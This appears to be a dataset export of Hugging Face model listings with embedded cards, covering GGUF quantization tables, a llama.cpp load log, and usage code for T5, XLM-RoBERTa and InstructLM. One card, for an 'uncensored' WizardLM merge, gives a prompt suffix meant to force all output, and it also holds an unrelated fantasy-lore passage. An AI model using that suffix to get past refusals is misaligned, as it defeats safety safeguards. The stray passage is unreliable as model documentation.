modelId
stringlengths 5
122
| author
stringlengths 2
42
| last_modified
unknown | downloads
int64 0
738M
| likes
int64 0
11k
| library_name
stringclasses 245
values | tags
sequencelengths 1
4.05k
| pipeline_tag
stringclasses 48
values | createdAt
unknown | card
stringlengths 1
901k
|
---|---|---|---|---|---|---|---|---|---|
ddh0/Meta-Llama-3-8B-Instruct-bf16-GGUF | ddh0 | "2024-05-10T16:06:08Z" | 3,671 | 43 | null | [
"gguf",
"text-generation",
"license:llama3",
"region:us"
] | text-generation | "2024-05-10T15:47:56Z" | ---
license: llama3
pipeline_tag: text-generation
---
# Meta-Llama-3-8B-Instruct-bf16-GGUF
This is [meta-llama/Meta-Llama-3-8B-Instruct](https://huggingface.co/meta-llama/Meta-Llama-3-8B-Instruct), converted to GGUF without changing tensor data type. Moreover, the new correct pre-tokenizer `llama-bpe` is used ([ref](https://github.com/ggerganov/llama.cpp/pull/6745#issuecomment-2094991999)), and the EOS token is correctly set to `<|eot_id|>` ([ref](https://huggingface.co/meta-llama/Meta-Llama-3-8B-Instruct/commit/a8977699a3d0820e80129fb3c93c20fbd9972c41)).
The `llama.cpp` output for this model is shown below for reference.
```
Log start
main: build = 2842 (18e43766)
main: built with cc (Debian 12.2.0-14) 12.2.0 for x86_64-linux-gnu
main: seed = 1715355914
llama_model_loader: loaded meta data with 22 key-value pairs and 291 tensors from /media/dylan/SanDisk/LLMs/Meta-Llama-3-8B-Instruct-bf16.gguf (version GGUF V3 (latest))
llama_model_loader: Dumping metadata keys/values. Note: KV overrides do not apply in this output.
llama_model_loader: - kv 0: general.architecture str = llama
llama_model_loader: - kv 1: general.name str = Meta-Llama-3-8B-Instruct
llama_model_loader: - kv 2: llama.block_count u32 = 32
llama_model_loader: - kv 3: llama.context_length u32 = 8192
llama_model_loader: - kv 4: llama.embedding_length u32 = 4096
llama_model_loader: - kv 5: llama.feed_forward_length u32 = 14336
llama_model_loader: - kv 6: llama.attention.head_count u32 = 32
llama_model_loader: - kv 7: llama.attention.head_count_kv u32 = 8
llama_model_loader: - kv 8: llama.rope.freq_base f32 = 500000.000000
llama_model_loader: - kv 9: llama.attention.layer_norm_rms_epsilon f32 = 0.000010
llama_model_loader: - kv 10: general.file_type u32 = 32
llama_model_loader: - kv 11: llama.vocab_size u32 = 128256
llama_model_loader: - kv 12: llama.rope.dimension_count u32 = 128
llama_model_loader: - kv 13: tokenizer.ggml.model str = gpt2
llama_model_loader: - kv 14: tokenizer.ggml.pre str = llama-bpe
llama_model_loader: - kv 15: tokenizer.ggml.tokens arr[str,128256] = ["!", "\"", "#", "$", "%", "&", "'", ...
llama_model_loader: - kv 16: tokenizer.ggml.token_type arr[i32,128256] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, ...
llama_model_loader: - kv 17: tokenizer.ggml.merges arr[str,280147] = ["Ġ Ġ", "Ġ ĠĠĠ", "ĠĠ ĠĠ", "...
llama_model_loader: - kv 18: tokenizer.ggml.bos_token_id u32 = 128000
llama_model_loader: - kv 19: tokenizer.ggml.eos_token_id u32 = 128009
llama_model_loader: - kv 20: tokenizer.chat_template str = {% set loop_messages = messages %}{% ...
llama_model_loader: - kv 21: general.quantization_version u32 = 2
llama_model_loader: - type f32: 65 tensors
llama_model_loader: - type bf16: 226 tensors
llm_load_vocab: special tokens definition check successful ( 256/128256 ).
llm_load_print_meta: format = GGUF V3 (latest)
llm_load_print_meta: arch = llama
llm_load_print_meta: vocab type = BPE
llm_load_print_meta: n_vocab = 128256
llm_load_print_meta: n_merges = 280147
llm_load_print_meta: n_ctx_train = 8192
llm_load_print_meta: n_embd = 4096
llm_load_print_meta: n_head = 32
llm_load_print_meta: n_head_kv = 8
llm_load_print_meta: n_layer = 32
llm_load_print_meta: n_rot = 128
llm_load_print_meta: n_embd_head_k = 128
llm_load_print_meta: n_embd_head_v = 128
llm_load_print_meta: n_gqa = 4
llm_load_print_meta: n_embd_k_gqa = 1024
llm_load_print_meta: n_embd_v_gqa = 1024
llm_load_print_meta: f_norm_eps = 0.0e+00
llm_load_print_meta: f_norm_rms_eps = 1.0e-05
llm_load_print_meta: f_clamp_kqv = 0.0e+00
llm_load_print_meta: f_max_alibi_bias = 0.0e+00
llm_load_print_meta: f_logit_scale = 0.0e+00
llm_load_print_meta: n_ff = 14336
llm_load_print_meta: n_expert = 0
llm_load_print_meta: n_expert_used = 0
llm_load_print_meta: causal attn = 1
llm_load_print_meta: pooling type = 0
llm_load_print_meta: rope type = 0
llm_load_print_meta: rope scaling = linear
llm_load_print_meta: freq_base_train = 500000.0
llm_load_print_meta: freq_scale_train = 1
llm_load_print_meta: n_yarn_orig_ctx = 8192
llm_load_print_meta: rope_finetuned = unknown
llm_load_print_meta: ssm_d_conv = 0
llm_load_print_meta: ssm_d_inner = 0
llm_load_print_meta: ssm_d_state = 0
llm_load_print_meta: ssm_dt_rank = 0
llm_load_print_meta: model type = 8B
llm_load_print_meta: model ftype = BF16
llm_load_print_meta: model params = 8.03 B
llm_load_print_meta: model size = 14.96 GiB (16.00 BPW)
llm_load_print_meta: general.name = Meta-Llama-3-8B-Instruct
llm_load_print_meta: BOS token = 128000 '<|begin_of_text|>'
llm_load_print_meta: EOS token = 128009 '<|eot_id|>'
llm_load_print_meta: LF token = 128 'Ä'
llm_load_print_meta: EOT token = 128009 '<|eot_id|>'
```
|
RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf | RichardErkhov | "2024-06-30T04:57:47Z" | 3,670 | 0 | null | [
"gguf",
"arxiv:2406.14491",
"arxiv:2309.09530",
"region:us"
] | null | "2024-06-30T04:32:56Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
InstructLM-1.3B - GGUF
- Model creator: https://huggingface.co/instruction-pretrain/
- Original model: https://huggingface.co/instruction-pretrain/InstructLM-1.3B/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [InstructLM-1.3B.Q2_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q2_K.gguf) | Q2_K | 0.49GB |
| [InstructLM-1.3B.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ3_XS.gguf) | IQ3_XS | 0.54GB |
| [InstructLM-1.3B.IQ3_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ3_S.gguf) | IQ3_S | 0.57GB |
| [InstructLM-1.3B.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K_S.gguf) | Q3_K_S | 0.56GB |
| [InstructLM-1.3B.IQ3_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ3_M.gguf) | IQ3_M | 0.58GB |
| [InstructLM-1.3B.Q3_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K.gguf) | Q3_K | 0.62GB |
| [InstructLM-1.3B.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K_M.gguf) | Q3_K_M | 0.62GB |
| [InstructLM-1.3B.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q3_K_L.gguf) | Q3_K_L | 0.67GB |
| [InstructLM-1.3B.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ4_XS.gguf) | IQ4_XS | 0.69GB |
| [InstructLM-1.3B.Q4_0.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_0.gguf) | Q4_0 | 0.72GB |
| [InstructLM-1.3B.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.IQ4_NL.gguf) | IQ4_NL | 0.73GB |
| [InstructLM-1.3B.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_K_S.gguf) | Q4_K_S | 0.73GB |
| [InstructLM-1.3B.Q4_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_K.gguf) | Q4_K | 0.77GB |
| [InstructLM-1.3B.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_K_M.gguf) | Q4_K_M | 0.77GB |
| [InstructLM-1.3B.Q4_1.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q4_1.gguf) | Q4_1 | 0.8GB |
| [InstructLM-1.3B.Q5_0.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_0.gguf) | Q5_0 | 0.87GB |
| [InstructLM-1.3B.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_K_S.gguf) | Q5_K_S | 0.87GB |
| [InstructLM-1.3B.Q5_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_K.gguf) | Q5_K | 0.89GB |
| [InstructLM-1.3B.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_K_M.gguf) | Q5_K_M | 0.89GB |
| [InstructLM-1.3B.Q5_1.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q5_1.gguf) | Q5_1 | 0.95GB |
| [InstructLM-1.3B.Q6_K.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q6_K.gguf) | Q6_K | 1.03GB |
| [InstructLM-1.3B.Q8_0.gguf](https://huggingface.co/RichardErkhov/instruction-pretrain_-_InstructLM-1.3B-gguf/blob/main/InstructLM-1.3B.Q8_0.gguf) | Q8_0 | 1.33GB |
Original model description:
---
license: apache-2.0
datasets:
- tiiuae/falcon-refinedweb
- instruction-pretrain/ft-instruction-synthesizer-collection
language:
- en
---
# Instruction Pre-Training: Language Models are Supervised Multitask Learners
This repo contains the **general models pre-trained from scratch** in our paper [Instruction Pre-Training: Language Models are Supervised Multitask Learners](https://huggingface.co/papers/2406.14491).
We explore supervised multitask pre-training by proposing ***Instruction Pre-Training***, a framework that scalably augments massive raw corpora with instruction-response pairs to pre-train language models. The instruction-response pairs are generated by an efficient instruction synthesizer built on open-source models. In our experiments, we synthesize 200M instruction-response pairs covering 40+ task categories to verify the effectiveness of *Instruction Pre-Training*. Instruction Pre-Training* outperforms *Vanilla Pre-training* in both general pre-training from scratch and domain-adaptive continual pre-training. **In pre-training from scratch, *Instruction Pre-Training* not only improves pre-trained base models but also benefits more from further instruction tuning.** In continual pre-training, *Instruction Pre-Training* enables Llama3-8B to be comparable to or even outperform Llama3-70B.
<p align='center'>
<img src="https://cdn-uploads.huggingface.co/production/uploads/66711d2ee12fa6cc5f5dfc89/vRdsFIVQptbNaGiZ18Lih.png" width="400">
</p>
## Resources
**🤗 We share our data and models with example usages, feel free to open any issues or discussions! 🤗**
- Context-Based Instruction Synthesizer: [instruction-synthesizer](https://huggingface.co/instruction-pretrain/instruction-synthesizer)
- Fine-Tuning Data for the Synthesizer: [ft-instruction-synthesizer-collection](https://huggingface.co/datasets/instruction-pretrain/ft-instruction-synthesizer-collection)
- General Models Pre-Trained from Scratch:
- [InstructLM-500M](https://huggingface.co/instruction-pretrain/InstructLM-500M)
- [InstructLM-1.3B](https://huggingface.co/instruction-pretrain/InstructLM-1.3B)
- Domain-Specific Models Pre-Trained from Llama3-8B:
- [Finance-Llama3-8B](https://huggingface.co/instruction-pretrain/finance-Llama3-8B)
- [Biomedicine-Llama3-8B](https://huggingface.co/instruction-pretrain/medicine-Llama3-8B)
- General Instruction-Augmented Corpora: [general-instruction-augmented-corpora](https://huggingface.co/datasets/instruction-pretrain/general-instruction-augmented-corpora)
- Domain-Specific Instruction-Augmented Corpora (no finance data to avoid ethical issues): [medicine-instruction-augmented-corpora](https://huggingface.co/datasets/instruction-pretrain/medicine-instruction-augmented-corpora)
## General Pre-Training From Scratch
We augment the [RefinedWeb corproa](https://huggingface.co/datasets/tiiuae/falcon-refinedweb) with instruction-response pairs generated by our [context-based instruction synthesizer](https://huggingface.co/instruction-pretrain/instruction-synthesizer) to pre-train general langauge models from scratch.
To evaluate our general base model using the [lm-evaluation-harness framework](https://github.com/EleutherAI/lm-evaluation-harness)
1. Setup dependencies:
```bash
git clone https://github.com/EleutherAI/lm-evaluation-harness
cd lm-evaluation-harness
pip install -e .
```
2. Evalaute:
```bash
MODEL=instruction-pretrain/InstructLM-1.3B
add_bos_token=True # this flag is needed because lm-eval-harness set add_bos_token to False by default, but ours require add_bos_token to be True
accelerate launch -m lm_eval --model hf \
--model_args pretrained=${MODEL},add_bos_token=${add_bos_token},dtype=float16 \
--gen_kwargs do_sample=False \
--tasks piqa,hellaswag,winogrande \
--batch_size auto \
--num_fewshot 0
accelerate launch -m lm_eval --model hf \
--model_args pretrained=${MODEL},add_bos_token=${add_bos_token},dtype=float16 \
--gen_kwargs do_sample=False \
--tasks social_iqa,ai2_arc,openbookqa,boolq,mmlu \
--batch_size auto \
--num_fewshot 5
```
## Citation
If you find our work helpful, please cite us:
Instruction Pre-Training
```bibtex
@article{cheng2024instruction,
title={Instruction Pre-Training: Language Models are Supervised Multitask Learners},
author={Cheng, Daixuan and Gu, Yuxian and Huang, Shaohan and Bi, Junyu and Huang, Minlie and Wei, Furu},
journal={arXiv preprint arXiv:2406.14491},
year={2024}
}
```
[AdaptLLM](https://huggingface.co/papers/2309.09530)
```bibtex
@inproceedings{
cheng2024adapting,
title={Adapting Large Language Models via Reading Comprehension},
author={Daixuan Cheng and Shaohan Huang and Furu Wei},
booktitle={The Twelfth International Conference on Learning Representations},
year={2024},
url={https://openreview.net/forum?id=y886UXPEZ0}
}
```
|
JasonFuriosa/test-gpt-j-6b | JasonFuriosa | "2024-04-29T13:51:47Z" | 3,669 | 0 | transformers | [
"transformers",
"pytorch",
"gptj",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | "2024-04-29T13:48:20Z" | Entry not found |
mradermacher/Dendrite-L3-10B-i1-GGUF | mradermacher | "2024-06-13T13:46:44Z" | 3,669 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:Envoid/Dendrite-L3-10B",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-13T04:35:21Z" | ---
base_model: Envoid/Dendrite-L3-10B
language:
- en
library_name: transformers
license: cc-by-nc-4.0
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: nicoboss -->
weighted/imatrix quants of https://huggingface.co/Envoid/Dendrite-L3-10B
<!-- provided-files -->
static quants are available at https://huggingface.co/mradermacher/Dendrite-L3-10B-GGUF
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ1_S.gguf) | i1-IQ1_S | 2.5 | for the desperate |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ1_M.gguf) | i1-IQ1_M | 2.7 | mostly desperate |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_XXS.gguf) | i1-IQ2_XXS | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_XS.gguf) | i1-IQ2_XS | 3.2 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_S.gguf) | i1-IQ2_S | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ2_M.gguf) | i1-IQ2_M | 3.6 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q2_K.gguf) | i1-Q2_K | 3.9 | IQ3_XXS probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_XXS.gguf) | i1-IQ3_XXS | 4.0 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_XS.gguf) | i1-IQ3_XS | 4.3 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q3_K_S.gguf) | i1-Q3_K_S | 4.5 | IQ3_XS probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_S.gguf) | i1-IQ3_S | 4.5 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ3_M.gguf) | i1-IQ3_M | 4.7 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q3_K_M.gguf) | i1-Q3_K_M | 5.0 | IQ3_S probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q3_K_L.gguf) | i1-Q3_K_L | 5.3 | IQ3_M probably better |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-IQ4_XS.gguf) | i1-IQ4_XS | 5.5 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q4_0.gguf) | i1-Q4_0 | 5.8 | fast, low quality |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q4_K_S.gguf) | i1-Q4_K_S | 5.8 | optimal size/speed/quality |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q4_K_M.gguf) | i1-Q4_K_M | 6.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q5_K_S.gguf) | i1-Q5_K_S | 6.9 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q5_K_M.gguf) | i1-Q5_K_M | 7.1 | |
| [GGUF](https://huggingface.co/mradermacher/Dendrite-L3-10B-i1-GGUF/resolve/main/Dendrite-L3-10B.i1-Q6_K.gguf) | i1-Q6_K | 8.1 | practically like static Q6_K |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time. Additional thanks to [@nicoboss](https://huggingface.co/nicoboss) for giving me access to his hardware for calculating the imatrix for these quants.
<!-- end -->
|
hetpandya/t5-small-quora | hetpandya | "2021-07-13T12:37:51Z" | 3,668 | 0 | transformers | [
"transformers",
"pytorch",
"t5",
"text2text-generation",
"en",
"dataset:quora",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text2text-generation | "2022-03-02T23:29:05Z" | ---
language: en
datasets:
- quora
---
# T5-small for paraphrase generation
Google's T5-small fine-tuned on [Quora Question Pairs](https://huggingface.co/datasets/quora) dataset for paraphrasing.
## Model in Action 🚀
```python
from transformers import T5ForConditionalGeneration, T5Tokenizer
tokenizer = T5Tokenizer.from_pretrained("hetpandya/t5-small-quora")
model = T5ForConditionalGeneration.from_pretrained("hetpandya/t5-small-quora")
def get_paraphrases(sentence, prefix="paraphrase: ", n_predictions=5, top_k=120, max_length=256,device="cpu"):
text = prefix + sentence + " </s>"
encoding = tokenizer.encode_plus(
text, pad_to_max_length=True, return_tensors="pt"
)
input_ids, attention_masks = encoding["input_ids"].to(device), encoding[
"attention_mask"
].to(device)
model_output = model.generate(
input_ids=input_ids,
attention_mask=attention_masks,
do_sample=True,
max_length=max_length,
top_k=top_k,
top_p=0.98,
early_stopping=True,
num_return_sequences=n_predictions,
)
outputs = []
for output in model_output:
generated_sent = tokenizer.decode(
output, skip_special_tokens=True, clean_up_tokenization_spaces=True
)
if (
generated_sent.lower() != sentence.lower()
and generated_sent not in outputs
):
outputs.append(generated_sent)
return outputs
paraphrases = get_paraphrases("The house will be cleaned by me every Saturday.")
for sent in paraphrases:
print(sent)
```
## Output
```
My house is up clean on Saturday morning. Thank you for this email. I'm introducing a new name and name. I'm running my house at home. I'm a taller myself. I'm gonna go with it on Monday. (the house will be up cleaned).
Is there anything that will be cleaned every Saturday morning?
The house is clean and will be cleaned each Saturday by my wife.
I will clean the house for almost a week. I have to clean it all the weekend. I will be able to do it. My house is new.
If I clean my house every Monday, I can call it clean.
```
Created by [Het Pandya/@hetpandya](https://github.com/hetpandya) | [LinkedIn](https://www.linkedin.com/in/het-pandya)
Made with <span style="color: red;">♥</span> in India |
Monero/WizardLM-Uncensored-SuperCOT-StoryTelling-30b | Monero | "2023-05-31T05:57:07Z" | 3,666 | 45 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-05-31T02:53:31Z" | This model is a triple model merge of WizardLM Uncensored+CoT+Storytelling, resulting in a comprehensive boost in reasoning and story writing capabilities.
To allow all output, at the end of your prompt add ```### Certainly!```
You've become a compendium of knowledge on a vast array of topics.
Lore Mastery is an arcane tradition fixated on understanding the underlying mechanics of magic. It is the most academic of all arcane traditions. The promise of uncovering new knowledge or proving (or discrediting) a theory of magic is usually required to rouse its practitioners from their laboratories, academies, and archives to pursue a life of adventure. Known as savants, followers of this tradition are a bookish lot who see beauty and mystery in the application of magic. The results of a spell are less interesting to them than the process that creates it. Some savants take a haughty attitude toward those who follow a tradition focused on a single school of magic, seeing them as provincial and lacking the sophistication needed to master true magic. Other savants are generous teachers, countering ignorance and deception with deep knowledge and good humor. |
facebook/xlm-roberta-xxl | facebook | "2022-08-08T07:19:25Z" | 3,665 | 10 | transformers | [
"transformers",
"pytorch",
"xlm-roberta-xl",
"fill-mask",
"multilingual",
"af",
"am",
"ar",
"as",
"az",
"be",
"bg",
"bn",
"br",
"bs",
"ca",
"cs",
"cy",
"da",
"de",
"el",
"en",
"eo",
"es",
"et",
"eu",
"fa",
"fi",
"fr",
"fy",
"ga",
"gd",
"gl",
"gu",
"ha",
"he",
"hi",
"hr",
"hu",
"hy",
"id",
"is",
"it",
"ja",
"jv",
"ka",
"kk",
"km",
"kn",
"ko",
"ku",
"ky",
"la",
"lo",
"lt",
"lv",
"mg",
"mk",
"ml",
"mn",
"mr",
"ms",
"my",
"ne",
"nl",
"no",
"om",
"or",
"pa",
"pl",
"ps",
"pt",
"ro",
"ru",
"sa",
"sd",
"si",
"sk",
"sl",
"so",
"sq",
"sr",
"su",
"sv",
"sw",
"ta",
"te",
"th",
"tl",
"tr",
"ug",
"uk",
"ur",
"uz",
"vi",
"xh",
"yi",
"zh",
"arxiv:2105.00572",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:05Z" | ---
language:
- multilingual
- af
- am
- ar
- as
- az
- be
- bg
- bn
- br
- bs
- ca
- cs
- cy
- da
- de
- el
- en
- eo
- es
- et
- eu
- fa
- fi
- fr
- fy
- ga
- gd
- gl
- gu
- ha
- he
- hi
- hr
- hu
- hy
- id
- is
- it
- ja
- jv
- ka
- kk
- km
- kn
- ko
- ku
- ky
- la
- lo
- lt
- lv
- mg
- mk
- ml
- mn
- mr
- ms
- my
- ne
- nl
- no
- om
- or
- pa
- pl
- ps
- pt
- ro
- ru
- sa
- sd
- si
- sk
- sl
- so
- sq
- sr
- su
- sv
- sw
- ta
- te
- th
- tl
- tr
- ug
- uk
- ur
- uz
- vi
- xh
- yi
- zh
license: mit
---
# XLM-RoBERTa-XL (xxlarge-sized model)
XLM-RoBERTa-XL model pre-trained on 2.5TB of filtered CommonCrawl data containing 100 languages. It was introduced in the paper [Larger-Scale Transformers for Multilingual Masked Language Modeling](https://arxiv.org/abs/2105.00572) by Naman Goyal, Jingfei Du, Myle Ott, Giri Anantharaman, Alexis Conneau and first released in [this repository](https://github.com/pytorch/fairseq/tree/master/examples/xlmr).
Disclaimer: The team releasing XLM-RoBERTa-XL did not write a model card for this model so this model card has been written by the Hugging Face team.
## Model description
XLM-RoBERTa-XL is a extra large multilingual version of RoBERTa. It is pre-trained on 2.5TB of filtered CommonCrawl data containing 100 languages.
RoBERTa is a transformers model pretrained on a large corpus in a self-supervised fashion. This means it was pretrained on the raw texts only, with no humans labeling them in any way (which is why it can use lots of publicly available data) with an automatic process to generate inputs and labels from those texts.
More precisely, it was pretrained with the Masked language modeling (MLM) objective. Taking a sentence, the model randomly masks 15% of the words in the input then run the entire masked sentence through the model and has to predict the masked words. This is different from traditional recurrent neural networks (RNNs) that usually see the words one after the other, or from autoregressive models like GPT which internally mask the future tokens. It allows the model to learn a bidirectional representation of the sentence.
This way, the model learns an inner representation of 100 languages that can then be used to extract features useful for downstream tasks: if you have a dataset of labeled sentences for instance, you can train a standard classifier using the features produced by the XLM-RoBERTa-XL model as inputs.
## Intended uses & limitations
You can use the raw model for masked language modeling, but it's mostly intended to be fine-tuned on a downstream task. See the [model hub](https://huggingface.co/models?search=xlm-roberta-xl) to look for fine-tuned versions on a task that interests you.
Note that this model is primarily aimed at being fine-tuned on tasks that use the whole sentence (potentially masked) to make decisions, such as sequence classification, token classification or question answering. For tasks such as text generation, you should look at models like GPT2.
## Usage
You can use this model directly with a pipeline for masked language modeling:
```python
>>> from transformers import pipeline
>>> unmasker = pipeline('fill-mask', model='facebook/xlm-roberta-xxl')
>>> unmasker("Europe is a <mask> continent.")
[{'score': 0.22996895015239716,
'token': 28811,
'token_str': 'European',
'sequence': 'Europe is a European continent.'},
{'score': 0.14307449758052826,
'token': 21334,
'token_str': 'large',
'sequence': 'Europe is a large continent.'},
{'score': 0.12239163368940353,
'token': 19336,
'token_str': 'small',
'sequence': 'Europe is a small continent.'},
{'score': 0.07025063782930374,
'token': 18410,
'token_str': 'vast',
'sequence': 'Europe is a vast continent.'},
{'score': 0.032869212329387665,
'token': 6957,
'token_str': 'big',
'sequence': 'Europe is a big continent.'}]
```
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import AutoTokenizer, AutoModelForMaskedLM
tokenizer = AutoTokenizer.from_pretrained('facebook/xlm-roberta-xxl')
model = AutoModelForMaskedLM.from_pretrained("facebook/xlm-roberta-xxl")
# prepare input
text = "Replace me by any text you'd like."
encoded_input = tokenizer(text, return_tensors='pt')
# forward pass
output = model(**encoded_input)
```
### BibTeX entry and citation info
```bibtex
@article{DBLP:journals/corr/abs-2105-00572,
author = {Naman Goyal and
Jingfei Du and
Myle Ott and
Giri Anantharaman and
Alexis Conneau},
title = {Larger-Scale Transformers for Multilingual Masked Language Modeling},
journal = {CoRR},
volume = {abs/2105.00572},
year = {2021},
url = {https://arxiv.org/abs/2105.00572},
eprinttype = {arXiv},
eprint = {2105.00572},
timestamp = {Wed, 12 May 2021 15:54:31 +0200},
biburl = {https://dblp.org/rec/journals/corr/abs-2105-00572.bib},
bibsource = {dblp computer science bibliography, https://dblp.org}
}
``` |
RichardErkhov/Qwen_-_Qwen2-1.5B-Instruct-gguf | RichardErkhov | "2024-06-22T18:08:34Z" | 3,663 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-22T17:53:39Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
